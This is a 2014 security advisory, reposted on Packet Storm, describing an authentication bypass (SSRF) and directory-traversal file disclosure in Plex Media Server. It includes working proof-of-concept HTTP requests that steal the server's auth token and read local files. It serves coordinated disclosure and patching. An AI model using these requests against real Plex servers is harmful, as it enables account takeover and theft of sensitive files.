exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Plex Media Server 0.9.9.2.374-aa23a69 Bypass / File Disclosure

Plex Media Server 0.9.9.2.374-aa23a69 Bypass / File Disclosure
Posted Feb 28, 2014
Authored by S. Viehbock | Site sec-consult.com

Plex Media Server versions 0.9.9.2.374-aa23a69 and below suffer from authentication bypass and local file disclosure vulnerabilities.

tags | exploit, local, vulnerability
SHA-256 | 5056a9a5be5beee1b56ca5f4a45fd08b7e9f849a4edabf46ffd88ef7a0b91dcc

Plex Media Server 0.9.9.2.374-aa23a69 Bypass / File Disclosure

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20140228-1 >
=======================================================================
title: Authentication bypass (SSRF) and local file disclosure
product: Plex Media Server
vulnerable version: <=0.9.9.2.374-aa23a69
fixed version: >=0.9.9.3
impact: Critical
homepage: http://www.plex.tv
found: 2014-02-06
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
"Plex is a media player system consisting of a player application with a
10-foot user interface and an associated media server. It is available for
Mac OS X, Linux, and Microsoft Windows."

URL: https://en.wikipedia.org/wiki/Plex_(software)


Vulnerability overview/description:
-----------------------------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The Plex Media Server "/system/proxy" functionality fails to properly validate
pre-authentication user requests. This allows unauthenticated attackers to make
the Plex Media Server execute arbitrary HTTP requests.

By requesting content from 127.0.0.1 an attacker can bypass all authentication
and execute commands with administrative privileges.

2. Unauthenticated local file disclosure
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.


Plex "Remote" servers (thousands of them can be found via Shodan and Google,
none of them were accessed) are affected by both vulnerabilities as well.


Proof of concept:
-----------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The following GET request bypasses the webserver whitelist.

GET /system/proxy HTTP/1.1
Host: <PLEX_WAN_HOST>
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/


The last X-Plex-Url header value "http://my.plexapp.com/" is contained in
the whitelist (Regex) and passes validation. The request is then processed by
the actual request handler in the backend webserver (Python). Here both header
values are concatenated using a comma. This way the actual URL that is
requested is controlled by the first X-Plex-Url value.
By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is
dissolved.

This results in the following request (made by Plex Media Server):

GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip


The response for this request is passed to the attacker and includes the
authToken value ("master token"), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.

<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">
</MyPlex>


A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8


2. Unauthenticated local file disclosure
The following requests show different functionality that is vulnerable to
directory traversal:

GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>

The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.



Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Plex Media Server version
0.9.9.2.374-aa23a69.


Vendor contact timeline:
------------------------
2014-02-09: Contacting vendor through elan@plexapp.com and requesting
encryption keys.
2014-02-10: Vendor provides encryption keys.
2014-02-10: Sending advisory and proof of concept exploit.
2014-02-10: Vendor acknowledges receipt of advisory.
2014-02-17: Requesting status update.
2014-02-17: Vendor provides release timeline.
2014-02-20: Vendor releases fixed version (0.9.9.3).
2014-02-21: Requesting clarification regarding fixed version.
2014-02-21: Vendors provides further information about fixed version and
other reported vulnerabilities.
2014-02-28: SEC Consult releases coordinated security advisory.


Solution:
---------
Update to a more recent version of Plex Media Server (eg. 0.9.9.5).


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2014
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close